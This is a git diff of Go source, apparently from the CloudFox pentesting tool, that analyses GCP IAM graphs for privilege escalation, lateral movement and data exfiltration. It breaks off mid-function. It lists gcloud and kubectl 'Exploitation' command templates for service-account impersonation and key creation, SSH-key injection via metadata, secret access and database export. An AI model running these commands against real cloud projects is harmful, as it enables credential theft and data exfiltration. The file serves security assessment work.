					} else if bestPath != nil && path.HopCount < bestPath.HopCount {
						bestPath = path
					}
				case "folder":
					finding.PathsToFolderAdmin++
					if finding.HighestAdminLevel == "" || finding.HighestAdminLevel == "project" {
						finding.HighestAdminLevel = "folder"
						bestPath = path
					} else if finding.HighestAdminLevel == "folder" && (bestPath == nil || path.HopCount < bestPath.HopCount) {
						bestPath = path
					}
				case "project":
					finding.PathsToProjectAdmin++
					if finding.HighestAdminLevel == "" {
						finding.HighestAdminLevel = "project"
						bestPath = path
					} else if finding.HighestAdminLevel == "project" && (bestPath == nil || path.HopCount < bestPath.HopCount) {
						bestPath = path
					}
				}

				// Track shortest path across all levels
				if finding.ShortestPathHops == 0 || path.HopCount < finding.ShortestPathHops {
					finding.ShortestPathHops = path.HopCount
				}
			}

			// Set the highest reachable target info
			if bestPath != nil {
				finding.HighestReachableTarget = bestPath.Destination
				finding.BestPathConfidence = bestPath.Confidence
				// Try to get project info from the destination node
				destNode := s.GetNode(bestPath.Destination)
				if destNode != nil {
					finding.HighestReachableProject = destNode.ProjectID
				}
			}
		}

		// Only include principals with privesc potential or admins
		if finding.IsAdmin || finding.CanEscalate {
			findings = append(findings, finding)
		}
	}

	return findings
}

// LateralFinding represents a lateral movement technique finding
type LateralFinding struct {
	Technique    string            `json:"technique"`
	Permission   string            `json:"permission"`
	Category     string            `json:"category"`
	Description  string            `json:"description"`
	Exploitation string            `json:"exploitation"`
	Principals   []PrincipalAccess `json:"principals"`
}

// LateralTechnique defines a lateral movement technique
type LateralTechnique struct {
	Permission   string
	Description  string
	Exploitation string
Category string
}

// GetLateralTechniques returns all lateral movement techniques
func GetLateralTechniques() map[string]LateralTechnique {
	return map[string]LateralTechnique{
		// Service Account Impersonation
		"sa_token_creator": {
			Permission:   "iam.serviceAccounts.getAccessToken",
			Description:  "Can get access tokens for service accounts",
			Exploitation: "gcloud auth print-access-token --impersonate-service-account=SA_EMAIL",
			Category:     "sa_impersonation",
		},
		"sa_key_creator": {
			Permission:   "iam.serviceAccountKeys.create",
			Description:  "Can create keys for service accounts",
			Exploitation: "gcloud iam service-accounts keys create key.json --iam-account=SA_EMAIL",
			Category:     "sa_impersonation",
		},
		"sa_sign_blob": {
			Permission:   "iam.serviceAccounts.signBlob",
			Description:  "Can sign blobs as service account",
			Exploitation: "gcloud iam service-accounts sign-blob --iam-account=SA_EMAIL input.txt output.txt",
			Category:     "sa_impersonation",
		},
		"sa_sign_jwt": {
			Permission:   "iam.serviceAccounts.signJwt",
			Description:  "Can sign JWTs as service account",
			Exploitation: "# Sign JWT to impersonate SA",
			Category:     "sa_impersonation",
		},
		"sa_openid_token": {
			Permission:   "iam.serviceAccounts.getOpenIdToken",
			Description:  "Can get OpenID tokens for service accounts",
			Exploitation: "gcloud auth print-identity-token --impersonate-service-account=SA_EMAIL",
			Category:     "sa_impersonation",
		},
		// Compute Access
		"compute_ssh_oslogin": {
			Permission:   "compute.instances.osLogin",
			Description:  "Can SSH to compute instances via OS Login",
			Exploitation: "gcloud compute ssh INSTANCE_NAME --zone=ZONE",
			Category:     "compute_access",
		},
		"compute_set_metadata": {
			Permission:   "compute.instances.setMetadata",
			Description:  "Can inject SSH keys via instance metadata",
			Exploitation: "gcloud compute instances add-metadata INSTANCE --metadata=ssh-keys=\"user:SSH_KEY\"",
			Category:     "compute_access",
		},
		"compute_set_project_metadata": {
			Permission:   "compute.projects.setCommonInstanceMetadata",
			Description:  "Can inject SSH keys via project metadata",
			Exploitation: "gcloud compute project-info add-metadata --metadata=ssh-keys=\"user:SSH_KEY\"",
			Category:     "compute_access",
		},
		"compute_serial_port": {
			Permission:   "compute.instances.getSerialPortOutput",
			Description:  "Can read serial port output (may leak data)",
			Exploitation: "gcloud compute instances get-serial-port-output INSTANCE --zone=ZONE",
			Category:     "compute_access",
		},
		// GKE Access
		"gke_get_credentials": {
			Permission:   "container.clusters.getCredentials",
			Description:  "Can get GKE cluster credentials",
			Exploitation: "gcloud container clusters get-credentials CLUSTER --zone=ZONE",
			Category:     "gke_access",
		},
		"gke_pod_exec": {
			Permission:   "container.pods.exec",
			Description:  "Can exec into GKE pods",
			Exploitation: "kubectl exec -it POD -- /bin/sh",
			Category:     "gke_access",
		},
		"gke_pod_attach": {
			Permission:   "container.pods.attach",
			Description:  "Can attach to GKE pods",
			Exploitation: "kubectl attach -it POD",
			Category:     "gke_access",
		},
		// Cloud Functions
		"functions_create": {
			Permission:   "cloudfunctions.functions.create",
			Description:  "Can create Cloud Functions with any SA",
			Exploitation: "gcloud functions deploy FUNC --runtime=python311 --service-account=SA_EMAIL",
			Category:     "serverless",
		},
		"functions_update": {
			Permission:   "cloudfunctions.functions.update",
			Description:  "Can update Cloud Functions to change SA or code",
			Exploitation: "gcloud functions deploy FUNC --service-account=SA_EMAIL",
			Category:     "serverless",
		},
		// Cloud Run
		"run_create": {
			Permission:   "run.services.create",
			Description:  "Can create Cloud Run services with any SA",
			Exploitation: "gcloud run deploy SERVICE --image=IMAGE --service-account=SA_EMAIL",
			Category:     "serverless",
		},
		"run_update": {
			Permission:   "run.services.update",
			Description:  "Can update Cloud Run services to change SA",
			Exploitation: "gcloud run services update SERVICE --service-account=SA_EMAIL",
			Category:     "serverless",
		},
		// Secrets
		"secret_access": {
			Permission:   "secretmanager.versions.access",
			Description:  "Can access secret values",
			Exploitation: "gcloud secrets versions access latest --secret=SECRET_NAME",
			Category:     "secrets",
		},
	}
}

// AnalyzeLateral analyzes lateral movement opportunities using graph data
// This is equivalent to running "foxmapper gcp query preset lateral"
// If pre-computed findings exist (lateral_findings.json), uses those.
// Otherwise falls back to edge-based analysis.
func (s *FoxMapperService) AnalyzeLateral(category string) []LateralFinding {
	if !s.initialized {
		return nil
	}

	// Use pre-computed findings from FoxMapper if available
	if s.LateralFindingsData != nil && len(s.LateralFindingsData.Findings) > 0 {
		return s.analyzeLateralFromFindings(category)
	}

	// Fallback to edge-based analysis (legacy behavior)
	return s.analyzeLateralFromEdges(category)
}

// analyzeLateralFromFindings uses pre-computed findings from lateral_findings.json
func (s *FoxMapperService) analyzeLateralFromFindings(category string) []LateralFinding {
	var findings []LateralFinding

	// Get the project ID from the findings data for project-level scope derivation
	projectID := s.LateralFindingsData.ProjectID

	for _, f := range s.LateralFindingsData.Findings {
		// Filter by category if specified
		if category != "" && f.Category != category {
			continue
		}

		// Convert file format to internal format
		var principals []PrincipalAccess
		for _, p := range f.Principals {
			// Get scope info from JSON fields, Resource, or derive from access_type
			scopeType := p.ScopeType
			scopeID := p.ScopeID
			scopeName := p.ScopeName

			if scopeType == "" {
				if p.Resource != "" {
					// Resource field exists in JSON
					scopeType, scopeID, scopeName =
s.parseResourceScope(p.Resource) + } else { + // Derive scope from access_type and available context + scopeType, scopeID, scopeName = s.deriveScopeFromContext(p.MemberID, p.AccessType, p.ViaEdge, projectID) + } + } + + principals = append(principals, PrincipalAccess{ + Principal: p.Principal, + MemberID: p.MemberID, + MemberType: p.MemberType, + IsAdmin: p.IsAdmin, + IsServiceAccount: p.IsServiceAccount, + AccessType: p.AccessType, + ViaEdge: p.ViaEdge, + EdgePath: p.EdgePath, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + }) + } + + if len(principals) > 0 { + findings = append(findings, LateralFinding{ + Technique: f.Technique, + Permission: f.Permission, + Category: f.Category, + Description: f.Description, + Exploitation: f.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// analyzeLateralFromEdges is the legacy edge-based analysis (fallback) +func (s *FoxMapperService) analyzeLateralFromEdges(category string) []LateralFinding { + var findings []LateralFinding + techniques := GetLateralTechniques() + + for name, tech := range techniques { + // Filter by category if specified + if category != "" && tech.Category != category { + continue + } + + // Find principals with this permission via edges + var principals []PrincipalAccess + for _, edge := range s.Edges { + // Check if edge grants this permission + if strings.Contains(strings.ToLower(edge.Reason), strings.ToLower(tech.Permission)) || + strings.Contains(edge.ShortReason, tech.Permission) { + node := s.GetNode(edge.Source) + if node != nil { + scopeType, scopeID, scopeName := s.parseResourceScope(edge.Resource) + principals = append(principals, PrincipalAccess{ + Principal: node.Email, + MemberID: node.MemberID, + MemberType: node.MemberType, + IsAdmin: node.IsAdmin, + IsServiceAccount: node.MemberType == "serviceAccount", + AccessType: "via_privesc", + ViaEdge: true, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + }) + } + } + } + + 
if len(principals) > 0 { + findings = append(findings, LateralFinding{ + Technique: name, + Permission: tech.Permission, + Category: tech.Category, + Description: tech.Description, + Exploitation: tech.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// DataExfilTechnique defines a data exfiltration technique +type DataExfilTechnique struct { + Permission string + Description string + Exploitation string + Service string +} + +// GetDataExfilTechniques returns all data exfiltration techniques +func GetDataExfilTechniques() map[string]DataExfilTechnique { + return map[string]DataExfilTechnique{ + // Storage + "gcs_objects_get": { + Permission: "storage.objects.get", + Description: "Can download objects from GCS buckets", + Exploitation: "gsutil cp gs://BUCKET/path/to/file ./local/", + Service: "storage", + }, + "gcs_objects_list": { + Permission: "storage.objects.list", + Description: "Can list objects in GCS buckets", + Exploitation: "gsutil ls -r gs://BUCKET/", + Service: "storage", + }, + // BigQuery + "bq_data_get": { + Permission: "bigquery.tables.getData", + Description: "Can read BigQuery table data", + Exploitation: "bq query 'SELECT * FROM dataset.table'", + Service: "bigquery", + }, + "bq_tables_export": { + Permission: "bigquery.tables.export", + Description: "Can export BigQuery tables to GCS", + Exploitation: "bq extract dataset.table gs://BUCKET/export.csv", + Service: "bigquery", + }, + // Cloud SQL + "cloudsql_export": { + Permission: "cloudsql.instances.export", + Description: "Can export Cloud SQL databases", + Exploitation: "gcloud sql export sql INSTANCE gs://BUCKET/export.sql --database=DB", + Service: "cloudsql", + }, + "cloudsql_connect": { + Permission: "cloudsql.instances.connect", + Description: "Can connect to Cloud SQL instances", + Exploitation: "gcloud sql connect INSTANCE --user=root", + Service: "cloudsql", + }, + // Secrets + "secrets_access": { + Permission: "secretmanager.versions.access", + 
Description: "Can access secret values", + Exploitation: "gcloud secrets versions access latest --secret=SECRET", + Service: "secretmanager", + }, + // KMS + "kms_decrypt": { + Permission: "cloudkms.cryptoKeyVersions.useToDecrypt", + Description: "Can decrypt data using KMS keys", + Exploitation: "gcloud kms decrypt --key=KEY --keyring=KEYRING --location=LOCATION --ciphertext-file=encrypted.bin --plaintext-file=decrypted.txt", + Service: "kms", + }, + // Logging + "logging_read": { + Permission: "logging.logEntries.list", + Description: "Can read log entries (may contain sensitive data)", + Exploitation: "gcloud logging read 'logName=\"projects/PROJECT/logs/LOG\"'", + Service: "logging", + }, + // Pub/Sub + "pubsub_receive": { + Permission: "pubsub.subscriptions.consume", + Description: "Can receive messages from Pub/Sub subscriptions", + Exploitation: "gcloud pubsub subscriptions pull SUBSCRIPTION --auto-ack", + Service: "pubsub", + }, + // Compute disk snapshots + "snapshot_useReadOnly": { + Permission: "compute.snapshots.useReadOnly", + Description: "Can use disk snapshots to create disks", + Exploitation: "gcloud compute disks create DISK --source-snapshot=SNAPSHOT", + Service: "compute", + }, + } +} + +// DataExfilFinding represents a data exfiltration finding +type DataExfilFinding struct { + Technique string `json:"technique"` + Permission string `json:"permission"` + Service string `json:"service"` + Description string `json:"description"` + Exploitation string `json:"exploitation"` + Principals []PrincipalAccess `json:"principals"` +} + +// AnalyzeDataExfil analyzes data exfiltration opportunities using graph data +// This is equivalent to running "foxmapper gcp query preset data-exfil" +// If pre-computed findings exist (data_exfil_findings.json), uses those. +// Otherwise falls back to edge-based analysis. 
+func (s *FoxMapperService) AnalyzeDataExfil(service string) []DataExfilFinding { + if !s.initialized { + return nil + } + + // Use pre-computed findings from FoxMapper if available + if s.DataExfilFindingsData != nil && len(s.DataExfilFindingsData.Findings) > 0 { + return s.analyzeDataExfilFromFindings(service) + } + + // Fallback to edge-based analysis (legacy behavior) + return s.analyzeDataExfilFromEdges(service) +} + +// analyzeDataExfilFromFindings uses pre-computed findings from data_exfil_findings.json +func (s *FoxMapperService) analyzeDataExfilFromFindings(service string) []DataExfilFinding { + var findings []DataExfilFinding + + // Get the project ID from the findings data for project-level scope derivation + projectID := s.DataExfilFindingsData.ProjectID + + for _, f := range s.DataExfilFindingsData.Findings { + // Filter by service if specified + if service != "" && f.Service != service { + continue + } + + // Convert file format to internal format + var principals []PrincipalAccess + for _, p := range f.Principals { + // Get scope info from JSON fields, Resource, or derive from access_type + scopeType := p.ScopeType + scopeID := p.ScopeID + scopeName := p.ScopeName + + if scopeType == "" { + if p.Resource != "" { + // Resource field exists in JSON + scopeType, scopeID, scopeName = s.parseResourceScope(p.Resource) + } else { + // Derive scope from access_type and available context + scopeType, scopeID, scopeName = s.deriveScopeFromContext(p.MemberID, p.AccessType, p.ViaEdge, projectID) + } + } + + principals = append(principals, PrincipalAccess{ + Principal: p.Principal, + MemberID: p.MemberID, + MemberType: p.MemberType, + IsAdmin: p.IsAdmin, + IsServiceAccount: p.IsServiceAccount, + AccessType: p.AccessType, + ViaEdge: p.ViaEdge, + EdgePath: p.EdgePath, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + }) + } + + if len(principals) > 0 { + findings = append(findings, DataExfilFinding{ + Technique: f.Technique, + Permission: 
f.Permission, + Service: f.Service, + Description: f.Description, + Exploitation: f.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// analyzeDataExfilFromEdges is the legacy edge-based analysis (fallback) +func (s *FoxMapperService) analyzeDataExfilFromEdges(service string) []DataExfilFinding { + var findings []DataExfilFinding + techniques := GetDataExfilTechniques() + + for name, tech := range techniques { + // Filter by service if specified + if service != "" && tech.Service != service { + continue + } + + // Find principals with this permission via edges + var principals []PrincipalAccess + for _, edge := range s.Edges { + // Check if edge grants this permission + if strings.Contains(strings.ToLower(edge.Reason), strings.ToLower(tech.Permission)) || + strings.Contains(edge.ShortReason, tech.Permission) { + node := s.GetNode(edge.Source) + if node != nil { + scopeType, scopeID, scopeName := s.parseResourceScope(edge.Resource) + principals = append(principals, PrincipalAccess{ + Principal: node.Email, + MemberID: node.MemberID, + MemberType: node.MemberType, + IsAdmin: node.IsAdmin, + IsServiceAccount: node.MemberType == "serviceAccount", + AccessType: "via_privesc", + ViaEdge: true, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + }) + } + } + } + + if len(principals) > 0 { + findings = append(findings, DataExfilFinding{ + Technique: name, + Permission: tech.Permission, + Service: tech.Service, + Description: tech.Description, + Exploitation: tech.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// GetAllNodes returns all nodes in the graph +func (s *FoxMapperService) GetAllNodes() []Node { + return s.Nodes +} + +// GetAllEdges returns all edges in the graph +func (s *FoxMapperService) GetAllEdges() []Edge { + return s.Edges +} + +// GetPolicies returns all policies in the graph +func (s *FoxMapperService) GetPolicies() []Policy { + return s.Policies +} + +// 
========================================== +// Wrong Admin (Hidden Admin) Analysis +// ========================================== + +// WrongAdminFinding represents a principal marked as admin without explicit admin roles +type WrongAdminFinding struct { + Principal string `json:"principal"` + MemberType string `json:"member_type"` + AdminLevel string `json:"admin_level"` // org, folder, project + Reasons []string `json:"reasons"` + ProjectID string `json:"project_id"` + FolderID string `json:"folder_id,omitempty"` // For folder-level admins + OrgID string `json:"org_id,omitempty"` // For org-level admins +} + +// ADMIN_ROLES are roles that grant explicit admin access +var ADMIN_ROLES = map[string]bool{ + "roles/owner": true, +} + +// SELF_ASSIGNMENT_ROLES are roles that can grant themselves admin access +var SELF_ASSIGNMENT_ROLES = map[string]bool{ + "roles/resourcemanager.projectIamAdmin": true, + "roles/resourcemanager.folderAdmin": true, + "roles/resourcemanager.organizationAdmin": true, + "roles/iam.securityAdmin": true, + "roles/iam.organizationRoleAdmin": true, +} + +// AnalyzeWrongAdmins finds principals marked as admin without explicit admin roles +// This is equivalent to running "foxmapper gcp query preset wrongadmin" +func (s *FoxMapperService) AnalyzeWrongAdmins() []WrongAdminFinding { + if !s.initialized { + return nil + } + + var findings []WrongAdminFinding + + for i := range s.Nodes { + node := &s.Nodes[i] + + // Skip non-admins + if !node.IsAdmin { + continue + } + + // Check if they have explicit admin role (roles/owner) + if s.hasExplicitAdminRole(node) { + continue + } + + // This is a "wrong admin" - get reasons why they're admin + reasons := s.getAdminReasons(node) + + // Get the highest admin resource ID (org, folder, or project) + folderID, orgID := s.getAdminResourceIDs(node) + + finding := WrongAdminFinding{ + Principal: node.Email, + MemberType: node.MemberType, + AdminLevel: node.AdminLevel, + Reasons: reasons, + ProjectID: 
node.ProjectID, + FolderID: folderID, + OrgID: orgID, + } + + if finding.AdminLevel == "" { + finding.AdminLevel = "project" + } + + findings = append(findings, finding) + } + + // Sort by admin level (org > folder > project) + sort.Slice(findings, func(i, j int) bool { + levelOrder := map[string]int{"org": 0, "folder": 1, "project": 2} + li, ok := levelOrder[findings[i].AdminLevel] + if !ok { + li = 3 + } + lj, ok := levelOrder[findings[j].AdminLevel] + if !ok { + lj = 3 + } + if li != lj { + return li < lj + } + return findings[i].Principal < findings[j].Principal + }) + + return findings +} + +// hasExplicitAdminRole checks if a node has roles/owner directly +func (s *FoxMapperService) hasExplicitAdminRole(node *Node) bool { + for _, policy := range s.Policies { + for _, binding := range policy.Bindings { + if !ADMIN_ROLES[binding.Role] { + continue + } + + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + // Check for conditions - conditional admin is "wrong" admin + if binding.Condition != nil && len(binding.Condition) > 0 { + return false + } + return true + } + } + } + } + return false +} + +// memberMatchesNode checks if a member string matches a node +func (s *FoxMapperService) memberMatchesNode(member string, node *Node) bool { + memberLower := strings.ToLower(member) + nodeMemberLower := strings.ToLower(node.MemberID) + + // Direct match + if memberLower == nodeMemberLower { + return true + } + + // Check group memberships + if strings.HasPrefix(member, "group:") && len(node.GroupMemberships) > 0 { + groupEmail := strings.ToLower(strings.SplitN(member, ":", 2)[1]) + for _, gm := range node.GroupMemberships { + if strings.ToLower(gm) == groupEmail || strings.ToLower(gm) == memberLower { + return true + } + } + } + + return false +} + +// getAdminReasons returns reasons why a node is marked as admin +func (s *FoxMapperService) getAdminReasons(node *Node) []string { + var reasons []string + + for _, policy := range 
s.Policies { + policyLevel := s.getPolicyLevel(policy.Resource) + + for _, binding := range policy.Bindings { + if !SELF_ASSIGNMENT_ROLES[binding.Role] { + continue + } + + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + conditionNote := "" + if binding.Condition != nil && len(binding.Condition) > 0 { + conditionNote = " (conditional)" + } + + switch binding.Role { + case "roles/resourcemanager.projectIamAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set project IAM policy (grant themselves roles/owner)", + binding.Role, policy.Resource, conditionNote)) + case "roles/resourcemanager.folderAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set folder IAM policy (grant themselves roles/owner at folder level)", + binding.Role, policy.Resource, conditionNote)) + case "roles/resourcemanager.organizationAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set organization IAM policy (grant themselves roles/owner at org level)", + binding.Role, policy.Resource, conditionNote)) + case "roles/iam.securityAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set IAM policies at %s level", + binding.Role, policy.Resource, conditionNote, policyLevel)) + case "roles/iam.organizationRoleAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can create/modify roles and has organization setIamPolicy", + binding.Role, policy.Resource, conditionNote)) + default: + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s", binding.Role, policy.Resource, conditionNote)) + } + break + } + } + } + } + + // Check for custom roles with setIamPolicy permissions + for _, policy := range s.Policies { + for _, binding := range policy.Bindings { + // Skip standard roles we already checked + if SELF_ASSIGNMENT_ROLES[binding.Role] || ADMIN_ROLES[binding.Role] { + continue + } + + // Check if it's a custom role + if strings.HasPrefix(binding.Role, "projects/") 
|| strings.HasPrefix(binding.Role, "organizations/") { + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + roleLower := strings.ToLower(binding.Role) + if strings.Contains(roleLower, "admin") || strings.Contains(roleLower, "iam") { + reasons = append(reasons, fmt.Sprintf( + "Has custom role %s on %s - may grant setIamPolicy permissions", + binding.Role, policy.Resource)) + } + break + } + } + } + } + } + + if len(reasons) == 0 { + reasons = append(reasons, fmt.Sprintf( + "Marked as %s admin but couldn't determine specific role - may be due to inherited permissions or group membership", + node.AdminLevel)) + } + + return reasons +} + +// getPolicyLevel determines the level of a policy resource +func (s *FoxMapperService) getPolicyLevel(resource string) string { + if strings.HasPrefix(resource, "organizations/") { + return "organization" + } else if strings.HasPrefix(resource, "folders/") { + return "folder" + } + return "project" +} + +// getAdminResourceIDs returns the folder ID and org ID where the node has admin access +// Returns the highest level resources (org > folder > project) +func (s *FoxMapperService) getAdminResourceIDs(node *Node) (folderID, orgID string) { + for _, policy := range s.Policies { + for _, binding := range policy.Bindings { + // Check for self-assignment roles (makes them admin) + if !SELF_ASSIGNMENT_ROLES[binding.Role] { + continue + } + + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + // Extract resource ID based on type + if strings.HasPrefix(policy.Resource, "organizations/") { + orgID = strings.TrimPrefix(policy.Resource, "organizations/") + } else if strings.HasPrefix(policy.Resource, "folders/") { + // Only set folderID if we don't already have org admin + // (org level is higher) + if orgID == "" { + folderID = strings.TrimPrefix(policy.Resource, "folders/") + } + } + } + } + } + } + return folderID, orgID +} + +// parseResourceScope extracts scope information 
from a resource string +// Returns scopeType, scopeID, scopeName +// Resource formats: "organizations/123", "folders/456", "projects/myproject", etc. +func (s *FoxMapperService) parseResourceScope(resource string) (scopeType, scopeID, scopeName string) { + if resource == "" { + return "unknown", "", "" + } + + if strings.HasPrefix(resource, "organizations/") { + scopeType = "organization" + scopeID = strings.TrimPrefix(resource, "organizations/") + // Try to get display name from metadata if available + scopeName = scopeID + } else if strings.HasPrefix(resource, "folders/") { + scopeType = "folder" + scopeID = strings.TrimPrefix(resource, "folders/") + scopeName = scopeID + } else if strings.HasPrefix(resource, "projects/") { + scopeType = "project" + scopeID = strings.TrimPrefix(resource, "projects/") + scopeName = scopeID + } else { + // Resource-level permission (e.g., storage bucket, BigQuery dataset) + scopeType = "resource" + scopeID = resource + scopeName = resource + } + + return scopeType, scopeID, scopeName +} + +// deriveScopeFromContext derives scope information when the Resource field is empty +// This is needed for pre-computed findings that don't include the resource field. +// For "project_iam" access type, we know the permission was granted at project level. +// For "via_privesc" access type, we look up the edge to find where the permission was granted. 
+func (s *FoxMapperService) deriveScopeFromContext(memberID, accessType string, viaEdge bool, fallbackProjectID string) (scopeType, scopeID, scopeName string) { + // For project_iam access, the permission was granted at the project level + if accessType == "project_iam" { + return "project", fallbackProjectID, fallbackProjectID + } + + // For via_privesc with viaEdge=true, look up the edge to find the resource + if viaEdge && accessType == "via_privesc" { + // Find the first edge from this principal to determine scope + for _, edge := range s.Edges { + if edge.Source == memberID { + if edge.Resource != "" { + return s.parseResourceScope(edge.Resource) + } + } + } + } + + // Fallback: if we have a project ID, assume project-level + if fallbackProjectID != "" { + return "project", fallbackProjectID, fallbackProjectID + } + + return "unknown", "", "" +} diff --git a/gcp/services/functionsService/functionsService.go b/gcp/services/functionsService/functionsService.go new file mode 100644 index 00000000..12b8c930 --- /dev/null +++ b/gcp/services/functionsService/functionsService.go @@ -0,0 +1,347 @@ +package functionsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + cloudfunctions "google.golang.org/api/cloudfunctions/v2" +) + +type FunctionsService struct{ + session *gcpinternal.SafeSession +} + +func New() *FunctionsService { + return &FunctionsService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *FunctionsService { + return &FunctionsService{ + session: session, + } +} + +// FunctionInfo holds Cloud Function details with security-relevant information +type FunctionInfo struct { + // Basic info + Name string + ProjectID string + Region string + State string + Description string + + // Runtime info + Runtime string + EntryPoint string + BuildID string + UpdateTime string + + // Security-relevant configuration + ServiceAccount string + 
IngressSettings string // ALL_TRAFFIC, INTERNAL_ONLY, INTERNAL_AND_GCLB + VPCConnector string + VPCEgressSettings string // PRIVATE_RANGES_ONLY, ALL_TRAFFIC + AllTrafficOnLatest bool + + // Resource configuration (new enhancements) + AvailableMemoryMB int64 // Memory in MB + AvailableCPU string // CPU (e.g., "1", "2") + TimeoutSeconds int64 // Timeout in seconds + MaxInstanceCount int64 // Max concurrent instances + MinInstanceCount int64 // Min instances (cold start prevention) + MaxInstanceRequestConcurrency int64 // Max concurrent requests per instance + + // Trigger info + TriggerType string // HTTP, Pub/Sub, Cloud Storage, etc. + TriggerURL string // For HTTP functions + TriggerEventType string + TriggerResource string + TriggerRetryPolicy string // RETRY_POLICY_RETRY, RETRY_POLICY_DO_NOT_RETRY + + // Environment variables + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // IAM (if retrieved) + IAMBindings []IAMBinding // All IAM bindings for this function + IsPublic bool // allUsers or allAuthenticatedUsers can invoke + + // Detailed env var and secret info (like Cloud Run) + EnvVars []EnvVarInfo // All environment variables with values + SecretEnvVarNames []string // Names of secret env vars + SecretVolumeNames []string // Names of secret volumes + + // Legacy fields (kept for compatibility) + EnvVarNames []string // Names of env vars (may hint at secrets) + SourceLocation string // GCS or repo source location + SourceType string // GCS, Repository +} + +// EnvVarInfo represents an environment variable configuration +type EnvVarInfo struct { + Name string + Value string // Direct value (may be empty if using secret ref) + Source string // "direct" or "secret-manager" + SecretName string // For Secret Manager references + SecretVersion string // Version (e.g., "latest", "1") +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// getService returns a Cloud Functions v2 
service instance, using cached wrapper if session is available +func (fs *FunctionsService) getService(ctx context.Context) (*cloudfunctions.Service, error) { + if fs.session != nil { + return sdk.CachedGetCloudFunctionsServiceV2(ctx, fs.session) + } + return cloudfunctions.NewService(ctx) +} + +// Functions retrieves all Cloud Functions in a project across all regions +func (fs *FunctionsService) Functions(projectID string) ([]FunctionInfo, error) { + ctx := context.Background() + + service, err := fs.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + var functions []FunctionInfo + + // List functions across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Functions.List(parent) + err = call.Pages(ctx, func(page *cloudfunctions.ListFunctionsResponse) error { + for _, fn := range page.Functions { + info := parseFunctionInfo(fn, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := fs.getFunctionIAMPolicy(service, fn.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, info.IsPublic = parseIAMBindings(iamPolicy) + } + + functions = append(functions, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + return functions, nil +} + +// parseFunctionInfo extracts relevant information from a Cloud Function +func parseFunctionInfo(fn *cloudfunctions.Function, projectID string) FunctionInfo { + info := FunctionInfo{ + Name: extractFunctionName(fn.Name), + ProjectID: projectID, + State: fn.State, + } + + // Extract region from function name + // Format: projects/{project}/locations/{location}/functions/{name} + parts := strings.Split(fn.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Build configuration + if fn.BuildConfig != nil { + info.Runtime = fn.BuildConfig.Runtime + info.EntryPoint = fn.BuildConfig.EntryPoint + 
info.BuildID = fn.BuildConfig.Build + + // Extract source location (pentest-relevant) + if fn.BuildConfig.Source != nil { + if fn.BuildConfig.Source.StorageSource != nil { + info.SourceType = "GCS" + info.SourceLocation = fmt.Sprintf("gs://%s/%s", + fn.BuildConfig.Source.StorageSource.Bucket, + fn.BuildConfig.Source.StorageSource.Object) + } else if fn.BuildConfig.Source.RepoSource != nil { + info.SourceType = "Repository" + info.SourceLocation = fmt.Sprintf("%s/%s@%s", + fn.BuildConfig.Source.RepoSource.ProjectId, + fn.BuildConfig.Source.RepoSource.RepoName, + fn.BuildConfig.Source.RepoSource.BranchName) + } + } + } + + // Service configuration + if fn.ServiceConfig != nil { + info.ServiceAccount = fn.ServiceConfig.ServiceAccountEmail + info.IngressSettings = fn.ServiceConfig.IngressSettings + info.VPCConnector = fn.ServiceConfig.VpcConnector + info.VPCEgressSettings = fn.ServiceConfig.VpcConnectorEgressSettings + info.AllTrafficOnLatest = fn.ServiceConfig.AllTrafficOnLatestRevision + + // Resource configuration (new enhancements) + if fn.ServiceConfig.AvailableMemory != "" { + // Parse memory string (e.g., "256M", "1G") + memStr := fn.ServiceConfig.AvailableMemory + if strings.HasSuffix(memStr, "M") { + if val, err := parseMemoryMB(memStr); err == nil { + info.AvailableMemoryMB = val + } + } else if strings.HasSuffix(memStr, "G") { + if val, err := parseMemoryMB(memStr); err == nil { + info.AvailableMemoryMB = val + } + } + } + info.AvailableCPU = fn.ServiceConfig.AvailableCpu + info.TimeoutSeconds = fn.ServiceConfig.TimeoutSeconds + info.MaxInstanceCount = fn.ServiceConfig.MaxInstanceCount + info.MinInstanceCount = fn.ServiceConfig.MinInstanceCount + info.MaxInstanceRequestConcurrency = fn.ServiceConfig.MaxInstanceRequestConcurrency + + // Extract environment variables with values + if fn.ServiceConfig.EnvironmentVariables != nil { + info.EnvVarCount = len(fn.ServiceConfig.EnvironmentVariables) + for key, value := range fn.ServiceConfig.EnvironmentVariables { + 
